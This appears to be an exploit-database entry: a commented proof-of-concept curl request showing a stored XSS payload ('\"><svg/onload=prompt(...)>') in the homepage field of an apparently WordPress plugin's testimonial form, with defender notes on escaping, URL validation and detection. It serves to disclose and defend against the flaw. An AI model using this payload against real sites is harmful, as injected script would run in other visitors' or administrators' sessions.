## https://sploitus.com/exploit?id=WPEX-ID:7F8E4A22-4349-483E-8071-07292AE96730
# Proof-of-concept request: submits a multipart/form-data POST to the /add/
# form on a placeholder host (example.com). The submit value "Add Testimonial"
# indicates a testimonial-submission form.
#
# Fields sent: wh_clientname, wh_company, wh_homepage, wh_text_short,
# wh_text_full, wh_sfimgurl (empty file part) and Wh_addnew (submit button).
# Every field holds benign filler except wh_homepage, which carries HTML markup
# instead of a URL. The leading `">` closes an attribute value and its tag, so
# the finding is that the homepage value is written into an HTML attribute
# without escaping.
# NOTE(review): presumably stored XSS, since this is a submission form that is
# rendered back to other visitors or to an admin. Confirm against the advisory.
#
# Defender notes:
#  - Fix belongs in the form handler and the template: accept only values that
#    parse as http(s) URLs for wh_homepage, and escape on output for the
#    attribute context. The WPEX-ID suggests a WordPress plugin; if so,
#    esc_url()/esc_attr() are the usual output helpers. TODO confirm.
#  - Detection: flag POSTs to the form where wh_homepage contains quote or
#    angle-bracket characters or does not parse as a URL, and review stored
#    testimonial rows for the same.
#  - The prompt() call is only a harmless execution marker. The risk is that
#    arbitrary script would run in the viewer's session.
#
# NOTE(review): the listing is an edited capture, not a verbatim request.
# 'Content-Length: XXX' is a placeholder, and one part delimiter in the body is
# spelled differently from the declared boundary. Treat it as an illustration
# of the affected parameter, not as a regression test to reuse unchanged.
curl -X POST 'http://example.com/add/' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \
-H 'Host: example.com' \
-H 'Content-Length: XXX' \
-d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormsoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'